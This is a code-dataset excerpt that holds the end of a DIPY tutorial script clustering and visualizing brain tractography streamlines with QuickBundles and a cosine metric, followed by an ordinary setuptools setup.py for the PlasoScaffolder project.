from dipy.segment.metric import CosineMetric
# Get some streamlines.
streamlines = get_streamlines() # Previously defined.
feature = VectorOfEndpointsFeature()
metric = CosineMetric(feature)
qb = QuickBundles(threshold=0.1, metric=metric)
clusters = qb.cluster(streamlines)
# Color each streamline according to the cluster they belong to.
colormap = fvtk.create_colormap(np.arange(len(clusters)))
colormap_full = np.ones((len(streamlines), 3))
for cluster, color in zip(clusters, colormap):
colormap_full[cluster.indices] = color
# Visualization
ren = fvtk.ren()
fvtk.clear(ren)
ren.SetBackground(0, 0, 0)
fvtk.add(ren, fvtk.streamtube(streamlines, colormap_full))
fvtk.record(ren, n_frames=1, out_path='cosine_metric.png', size=(600, 600))
"""
.. figure:: cosine_metric.png
:align: center
**Showing the streamlines colored according to their orientation**.
.. include:: ../links_names.inc
.. [Garyfallidis12] Garyfallidis E. et al., QuickBundles a method for
tractography simplification, Frontiers in Neuroscience, vol
6, no 175, 2012.
"""
|
ClaudiaSaxer/PlasoScaffolder
|
refs/heads/master
|
src/setup.py
|
1
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""This is the setup file for the project."""
from setuptools import find_packages
from setuptools import setup
setup(name='plasoscaffolder',
version='0.1',
packages=find_packages(),
include_package_data=True,
package_data={'plasoscaffolder.bll.templates': ['*.jinja2'],'':['.style.yapf']},
install_requires=['Click>=6.7',
'setuptools>=35.0.2',
'jinja2>=2.9.6',
'colorama>=0.3.7',
'yapf==0.16.1',
'pexpect>=4.2.1'],
entry_points={'console_scripts': [
'plasoscaffolder=plasoscaffolder.frontend.main:entry_point']},
# metadata for upload to PyPI
author="Claudia Saxer",
description="This is a scaffolder for sqlite plugins for plaso.",
keywords="plaso scaffolder",
url="http://plasoscaffolder.readthedocs.io")
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.